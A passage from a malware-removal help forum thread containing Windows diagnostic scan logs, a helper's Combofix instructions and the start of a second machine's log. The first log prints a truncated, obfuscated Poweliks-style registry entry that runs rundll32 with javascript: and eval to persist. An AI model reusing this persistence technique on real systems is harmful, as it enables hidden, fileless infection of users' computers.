Trams Back Office (HKLM-x32\...\Trams Back Office) (Version:  - Sabre)
Update for Microsoft Filter Pack 2.0 (KB2878281) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0000-0000-0000000FF1CE}_Office14.OUTLOOK_{302A8FE3-EBF5-486C-A431-16A1CD914443}) (Version:  - Microsoft)
Update for Microsoft Filter Pack 2.0 (KB2878281) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.OUTLOOK_{302A8FE3-EBF5-486C-A431-16A1CD914443}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589298) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0000-0000-0000000FF1CE}_Office14.OUTLOOK_{DADF7E25-FFA4-4D02-BE84-1DAE62C18516}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0000-0000-0000000FF1CE}_Office14.OUTLOOK_{F4284D93-7AE8-4309-8CF3-9AD394F35F3A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.OUTLOOK_{F4284D93-7AE8-4309-8CF3-9AD394F35F3A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589375) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0000-0000-0000000FF1CE}_Office14.OUTLOOK_{287A1E92-9E41-4BC1-8920-B3D0E9220800}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2597087) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0000-0000-0000000FF1CE}_Office14.OUTLOOK_{9D69691D-823D-4C3E-9B12-563A3F520366}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2687502) 32-Bit Edition (HKLM-x32\...\{90140000-001F-0409-0000-0000000FF1CE}_Office14.OUTLOOK_{7DE7DF97-82FE-4B3A-AB8D-1621F9CC464A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760598) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0000-0000-0000000FF1CE}_Office14.OUTLOOK_{ECFE33A3-B8B7-439A-ADE4-59FBD29EF9B8}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760598) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.OUTLOOK_{ECFE33A3-B8B7-439A-ADE4-59FBD29EF9B8}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2794737) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0000-0000-0000000FF1CE}_Office14.OUTLOOK_{5AA578BB-759C-40FD-9661-A737C0884541}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2837581) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0000-0000-0000000FF1CE}_Office14.OUTLOOK_{334FB202-28D7-4BA4-8BC9-4FE4AB233EA0}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2878252) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0000-0000-0000000FF1CE}_Office14.OUTLOOK_{B0DB9F71-E0F7-4FE6-8925-35B860CAC0C4}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2881028) 32-Bit Edition (HKLM-x32\...\{90140000-001F-040C-0000-0000000FF1CE}_Office14.OUTLOOK_{089DBFD7-8211-43B2-AAAE-5BDD8C23E3A8}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2881028) 32-Bit Edition (HKLM-x32\...\{90140000-001F-0C0A-0000-0000000FF1CE}_Office14.OUTLOOK_{794A0574-4E2F-4D58-B2A0-D7460ACDC85C}) (Version:  - Microsoft)
Update for Microsoft OneNote 2010 (KB2837595) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.OUTLOOK_{51CCA922-A0CC-47C4-8910-6936D97CAC2E}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0000-0000-0000000FF1CE}_Office14.OUTLOOK_{2AB483F1-C86E-427A-83B4-23889B03512D}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0409-0000-0000000FF1CE}_Office14.OUTLOOK_{DCE104A1-1875-4469-A83D-A5BFA6C4640F}) (Version:  - Microsoft)
Update for Microsoft SharePoint Workspace 2010 (KB2760601) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.OUTLOOK_{F9F5A080-AF38-4966-9A6B-C43DCA465035}) (Version:  - Microsoft)
Update for Microsoft Word 2010 (KB2880529) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0000-0000-0000000FF1CE}_Office14.OUTLOOK_{B9B89E01-5B6B-4F73-BC34-B2C0D8ACB4CD}) (Version:  - Microsoft)
Windows Live Communications Platform (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3508.1109 - Microsoft Corporation)
Windows Live Essentials (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live ID Sign-in Assistant (Version: 7.250.4225.0 - Microsoft Corporation) Hidden
Windows Live Installer (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Language Selector (Version: 15.4.3508.1109 - Microsoft Corporation) Hidden
Windows Live Mail (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Messenger (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live MIME IFilter (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Movie Maker (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Photo Common (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Photo Gallery (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live PIMT Platform (x32 Version: 15.4.3508.1109 - Microsoft Corporation) Hidden
Windows Live SOXE (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live SOXE Definitions (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live UX Platform (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live UX Platform Language Pack (x32 Version: 15.4.3508.1109 - Microsoft Corporation) Hidden
Windows Live Writer (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Writer Resources (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-1305414874-3063939017-1416520829-1002_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?

==================== Restore Points  =========================


==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 22:34 - 2009-06-10 17:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {0D58F4E2-E3FD-4E05-8C82-CCAD69414BAB} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-01-27] (Google Inc.)
Task: {33C21B4E-99DD-499F-A979-1F6FA21CCF7C} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-01-27] (Google Inc.)
Task: {3A7CEB89-D6F1-4B51-9000-2AFBC8DE0C75} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2013-07-22] (Piriform Ltd)
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Loaded Modules (whitelisted) =============

2013-08-20 00:53 - 2013-04-15 11:50 - 00198144 _____ () C:\Windows\System32\HP1006LM.DLL
2013-08-20 00:55 - 2013-04-15 11:50 - 00065024 _____ () C:\Windows\system32\spool\PRTPROCS\x64\HP1006PP.dll
2013-08-19 19:47 - 2012-04-09 14:24 - 00055152 _____ () C:\ICVERIFY\ICWin420\PCVXWinServiceManager.exe
2013-08-19 19:47 - 2012-04-09 14:26 - 00149360 _____ () C:\ICVERIFY\ICWin420\Jcard\JCardService.exe
2013-08-12 14:22 - 2012-03-26 18:33 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2014-06-26 10:54 - 2014-06-26 10:54 - 00623432 _____ () C:\Program Files (x86)\Intuit1\QuickBooks 2014\boost_regex-vc100-mt-1_47.dll
2014-06-26 10:56 - 2014-06-26 10:56 - 00021320 _____ () C:\Program Files (x86)\Intuit1\QuickBooks 2014\QBCompressor.dll
2014-06-26 06:42 - 2014-06-26 06:42 - 00059904 _____ () C:\Program Files (x86)\Intuit1\QuickBooks 2014\zlib1.dll
2014-06-26 10:56 - 2014-06-26 10:56 - 00149320 _____ () C:\Program Files (x86)\Intuit1\QuickBooks 2014\QBMAPILibrary.dll
2014-06-26 10:54 - 2014-06-26 10:54 - 00247112 _____ () C:\Program Files (x86)\Intuit1\QuickBooks 2014\boost_serialization-vc100-mt-1_47.dll
2014-06-26 10:54 - 2014-06-26 10:54 - 00623944 _____ () C:\Program Files (x86)\Intuit1\QuickBooks 2014\FtuEngine.dll
2014-06-26 10:53 - 2014-06-26 10:53 - 00582472 _____ () C:\Program Files (x86)\Intuit1\QuickBooks 2014\BackupLib.dll
2014-06-26 10:56 - 2014-06-26 10:56 - 00142664 _____ () C:\Program Files (x86)\Intuit1\QuickBooks 2014\QBProActiveCore.dll
2014-06-26 10:54 - 2014-06-26 10:54 - 00791880 _____ () C:\Program Files (x86)\Intuit1\QuickBooks 2014\FeaturesBridge.dll
2014-06-26 10:55 - 2014-06-26 10:55 - 00043848 _____ () C:\Program Files (x86)\Intuit1\QuickBooks 2014\mbpopup.dll
2013-08-19 21:54 - 2003-03-26 18:46 - 00135168 _____ () C:\Program Files (x86)\PFU\ScanSnap\Driver\PfuSsImgIO.dll
2013-08-19 21:54 - 2008-10-16 19:01 - 00036864 _____ () C:\Program Files (x86)\PFU\ScanSnap\Driver\PfuUpdater.dll
2013-08-20 00:06 - 2008-06-10 18:10 - 00032768 _____ () C:\Program Files (x86)\PFU\ScanSnap\Driver\PfuSsLaunchApp.dll
2013-08-20 00:06 - 2008-02-20 17:49 - 00028672 _____ () C:\Program Files (x86)\PFU\ScanSnap\Driver\PfuSsExtention.dll
2013-08-20 00:06 - 2008-06-17 14:18 - 00024576 _____ () C:\Program Files (x86)\PFU\ScanSnap\Driver\PfuSsCommon.dll
2013-08-19 21:54 - 2007-06-26 20:27 - 00167936 _____ () C:\Program Files (x86)\PFU\ScanSnap\Driver\SSsltsa.dll
2013-08-19 21:54 - 2003-04-21 14:19 - 00020480 _____ () C:\Windows\SSDriver\fi5110\fjipl.dll
2013-08-19 21:54 - 2003-04-21 14:19 - 00851968 _____ () C:\Windows\SSDriver\fi5110\fjiplA6.DLL
2013-08-19 21:54 - 2005-07-08 11:36 - 00094208 _____ () C:\Program Files (x86)\PFU\ScanSnap\Driver\f5bdkedr.dll
2013-08-19 21:54 - 1996-12-19 13:24 - 00068608 _____ () C:\Program Files (x86)\PFU\ScanSnap\Driver\F5BDKAKU.DLL
2013-08-19 21:54 - 2003-11-20 21:56 - 00020480 _____ () C:\Program Files (x86)\PFU\ScanSnap\Driver\ssIpl.dll
2013-08-19 21:54 - 2003-11-20 21:56 - 00294912 _____ () C:\Program Files (x86)\PFU\ScanSnap\Driver\ssIplA6.DLL
2013-08-19 21:54 - 2007-05-16 08:45 - 00011776 _____ () C:\Program Files (x86)\PFU\ScanSnap\Driver\SecurityManager.dll
2013-08-19 21:54 - 2007-05-16 08:45 - 00009216 _____ () C:\Program Files (x86)\PFU\ScanSnap\Driver\PolicyCommon.dll
2014-08-25 13:38 - 2014-08-25 13:38 - 03800688 _____ () C:\Program Files (x86)\Mozilla Firefox\mozjs.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)


==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\GoToAssist Remote Support Customer => ""="Service"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^QuickBooks Update Agent.lnk => C:\Windows\pss\QuickBooks Update Agent.lnk.CommonStartup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: AdobeAAMUpdater-1.0 => "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
MSCONFIG\startupreg: BCSSync => "C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe" /DelayServices
MSCONFIG\startupreg: Desktop Disc Tool => "C:\Program Files (x86)\Roxio\OEM\Roxio Burn\RoxioBurnLauncher.exe"
MSCONFIG\startupreg: GoogleChromeAutoLaunch_750F906B42ACC1CB72E4EE60E2CAC921 => "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-startup-window
MSCONFIG\startupreg: Intuit SyncManager => C:\Program Files (x86)\Common Files\Intuit\Sync\IntuitSyncManager.exe  startup
MSCONFIG\startupreg: PDVD9LanguageShortcut => "C:\Program Files (x86)\CyberLink\PowerDVD9\Language\Language.exe"
MSCONFIG\startupreg: RemoteControl9 => "C:\Program Files (x86)\CyberLink\PowerDVD9\PDVD9Serv.exe"

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (09/01/2014 01:28:24 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (09/01/2014 01:01:21 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (09/01/2014 00:20:53 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/31/2014 05:13:20 PM) (Source: QuickBooks) (EventID: 4) (User: )
Description: An unexpected error has occured in "QuickBooks Pro Plus 2014":
DB error -308 ErrorMessage:'Connection was terminated' from file:'.\.\src\DMSQLPrefAttribute.cpp' at line 153 from function:'DMPrefAttribute::IDBPrefAttribute::DBLoad'

Error: (08/31/2014 05:13:19 AM) (Source: QuickBooks) (EventID: 4) (User: )
Description: An unexpected error has occured in "QuickBooks Pro Plus 2014":
DB error -308 ErrorMessage:'Connection was terminated' from file:'.\.\src\DMSQLPrefAttribute.cpp' at line 153 from function:'DMPrefAttribute::IDBPrefAttribute::DBLoad'

Error: (08/30/2014 05:13:19 PM) (Source: QuickBooks) (EventID: 4) (User: )
Description: An unexpected error has occured in "QuickBooks Pro Plus 2014":
DB error -308 ErrorMessage:'Connection was terminated' from file:'.\.\src\DMSQLPrefAttribute.cpp' at line 153 from function:'DMPrefAttribute::IDBPrefAttribute::DBLoad'

Error: (08/30/2014 05:13:18 AM) (Source: QuickBooks) (EventID: 4) (User: )
Description: An unexpected error has occured in "QuickBooks Pro Plus 2014":
DB error -308 ErrorMessage:'Connection was terminated' from file:'.\.\src\DMSQLPrefAttribute.cpp' at line 153 from function:'DMPrefAttribute::IDBPrefAttribute::DBLoad'

Error: (08/29/2014 10:35:59 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 9.0.8112.16563, time stamp: 0x4a5bc6b7
Faulting module name: Flash32_11_8_800_94.ocx, version: 11.8.800.94, time stamp: 0x51c4d6e5
Exception code: 0xc0000005
Fault offset: 0x005fa927
Faulting process id: 0x29e0
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (08/29/2014 06:27:27 PM) (Source: QuickBooks) (EventID: 4) (User: )
Description: An unexpected error has occured in "QuickBooks Pro Plus 2014":
DB error -308 ErrorMessage:'Connection was terminated' from file:'.\.\src\DMSQLPrefAttribute.cpp' at line 153 from function:'DMPrefAttribute::IDBPrefAttribute::DBLoad'

Error: (08/29/2014 05:13:17 PM) (Source: QuickBooks) (EventID: 4) (User: )
Description: An unexpected error has occured in "QuickBooks Pro Plus 2014":
DB error -308 ErrorMessage:'Connection was terminated' from file:'.\.\src\DMSQLPrefAttribute.cpp' at line 153 from function:'DMPrefAttribute::IDBPrefAttribute::DBLoad'


System errors:
=============
Error: (09/01/2014 01:29:49 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The PCVXFileMonitor service hung on starting.

Error: (09/01/2014 01:29:45 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The ICVTnsServer service hung on starting.

Error: (09/01/2014 01:28:34 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (09/01/2014 01:28:20 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The PMEM service failed to start due to the following error:
%%1275

Error: (09/01/2014 01:28:20 AM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Windows\SysWOW64\drivers\pmemnt.sys has been blocked from loading due to incompatibility with this system. Please contact your software vendor for a compatible version of the driver.

Error: (09/01/2014 01:02:46 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The PCVXFileMonitor service hung on starting.

Error: (09/01/2014 01:02:42 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The ICVTnsServer service hung on starting.

Error: (09/01/2014 01:01:31 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (09/01/2014 01:01:18 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The PMEM service failed to start due to the following error:
%%1275

Error: (09/01/2014 01:01:18 AM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Windows\SysWOW64\drivers\pmemnt.sys has been blocked from loading due to incompatibility with this system. Please contact your software vendor for a compatible version of the driver.


Microsoft Office Sessions:
=========================

CodeIntegrity Errors:
===================================
  Date: 2014-09-01 01:28:20.678
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\SysWOW64\drivers\PMEMNT.SYS because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2014-09-01 01:28:20.632
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\SysWOW64\drivers\PMEMNT.SYS because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2014-09-01 01:01:18.022
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\SysWOW64\drivers\PMEMNT.SYS because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2014-09-01 01:01:17.975
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\SysWOW64\drivers\PMEMNT.SYS because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2014-08-28 03:20:35.126
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\SysWOW64\drivers\PMEMNT.SYS because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2014-08-28 03:20:35.095
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\SysWOW64\drivers\PMEMNT.SYS because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2014-08-16 03:34:49.373
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\SysWOW64\drivers\PMEMNT.SYS because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2014-08-16 03:34:49.342
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\SysWOW64\drivers\PMEMNT.SYS because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2014-08-11 10:12:07.430
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\SysWOW64\drivers\PMEMNT.SYS because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2014-08-11 10:12:07.398
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\SysWOW64\drivers\PMEMNT.SYS because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.


==================== Memory info ===========================

Processor: Intel® Core™ i5-3470 CPU @ 3.20GHz
Percentage of memory in use: 85%
Total physical RAM: 6046.07 MB
Available physical RAM: 903.72 MB
Total Pagefile: 12090.32 MB
Available Pagefile: 4586.14 MB
Total Virtual: 8192 MB
Available Virtual: 8191.81 MB

==================== Drives ================================

Drive c: (OSDisk) (Fixed) (Total:452.09 GB) (Free:384.33 GB) NTFS
Drive i: (OS) (Network) (Total:464.98 GB) (Free:316.15 GB) NTFS
Drive m: (OS) (Network) (Total:464.98 GB) (Free:316.15 GB) NTFS
Drive p: (OS) (Network) (Total:464.98 GB) (Free:316.15 GB) NTFS
Drive s: (OS) (Network) (Total:464.98 GB) (Free:316.15 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: C70A6B68)
Partition 1: (Not Active) - (Size=452.1 GB) - (Type=07 NTFS)
Partition 2: (Active) - (Size=13.7 GB) - (Type=07 NTFS)

==================== End Of Log ============================


#2 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • Gender:Male
  • Local time:11:45 AM

Posted 01 September 2014 - 08:19 AM

Hi there,

please run Combofix:


Please download Combofix (by sUBs) and save it to your Desktop.
  • Disable the realtime-protection of your antivirus and anti-malware programs because they might interfere with the scan.
  • Start Combofix.exe and follow its instructions.
  • Do not use the computer while the scan is running. This may cause the program to stall.
  • When finished, a log file will be displayed (that can also be found at C:\Combofix.txt).
    Please copy and paste the contents of this file into your next post.
Note: If you receive an error "Illegal operation attempted on a registry key that has been marked for deletion." after the scan, just restart the computer.
(You can find more detailed instructions in this guide on using Combofix.)

#3 litepc

litepc
  • Topic Starter

  • Members
  • 12 posts
  • Local time:05:45 AM

Posted 01 September 2014 - 08:28 AM

Thank you kindly:

 

I will do that I guess when I am actually at the PC. I was working remotely so I will try it tomorrow and update you.

 

Thank you again,

 

Emanuel



#4 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • Gender:Male
  • Local time:11:45 AM

Posted 01 September 2014 - 11:21 AM

Ok, that's alright, thanks for letting me know.

#5 litepc

litepc
  • Topic Starter

  • Members
  • 12 posts
  • Local time:05:45 AM

Posted 01 September 2014 - 12:01 PM

Thank you.

 

In the meantime I have a problem with my other PC.

I ran the Combofix; it had errors, but then it did all of the 11 scans, but it did not do anything more than that.

Here are the FRST files for that one... if you can help at all, please.

 

Thank you.

 

---------------------------------------------------------------------------------

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version:31-08-2014 02
Ran by LW (administrator) on TravelR on 01-09-2014 12:31:15
Running from C:\Documents and Settings\LW\My Documents\Downloads
Platform: Microsoft Windows XP Professional Service Pack 3 (X86) OS Language: English (United States)
Internet Explorer Version 8
Boot Mode: Normal

The only official download link for FRST:
Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/
Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Enigma Software Group USA, LLC.) C:\PROGRA~1\ENIGMA~1\SPYHUN~1\SH4SER~1.EXE
(Amadeus) C:\Program Files\Automatic Update\AutoUpdate.exe
(ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToAssist Remote Support Customer\715\g2ax_service.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2svc.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2comm.exe
(HP) C:\Program Files\HP\HPLaserJetService\HPLaserJetService.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2pre.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2tray.exe
(Sun Microsystems, Inc.) C:\Program Files\Java\jre6\bin\jqs.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
(Intuit) C:\Program Files\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe
(Intuit Inc.) C:\Program Files\Common Files\Intuit\DataProtect\QBIDPService.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToAssist Remote Support Customer\715\g2ax_comm_customer.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToAssist Remote Support Customer\715\g2ax_system_customer.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToAssist Remote Support Customer\715\g2ax_user_customer.exe
(Intel Corporation) C:\WINDOWS\system32\igfxpers.exe
(CyberLink Corp.) C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe
(Intel Corporation) C:\WINDOWS\system32\hkcmd.exe
(Intel Corporation) C:\WINDOWS\system32\igfxsrvc.exe
(Hewlett-Packard Company) C:\Program Files\HP\ToolboxFX\bin\HPTLBXFX.exe
(Analog Devices, Inc.) C:\Program Files\Analog Devices\Core\smax4pnp.exe
(Hewlett-Packard) C:\Program Files\HP\HP Software Update\hpwuschd2.exe
(Google Inc.) C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
(Intuit Inc.) C:\Program Files\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\wscntfy.exe
(Starfield Technologies) C:\Program Files\Workspace\workspaceupdate.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToAssist Remote Support Customer\715\g2ax_host.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\taskmgr.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe


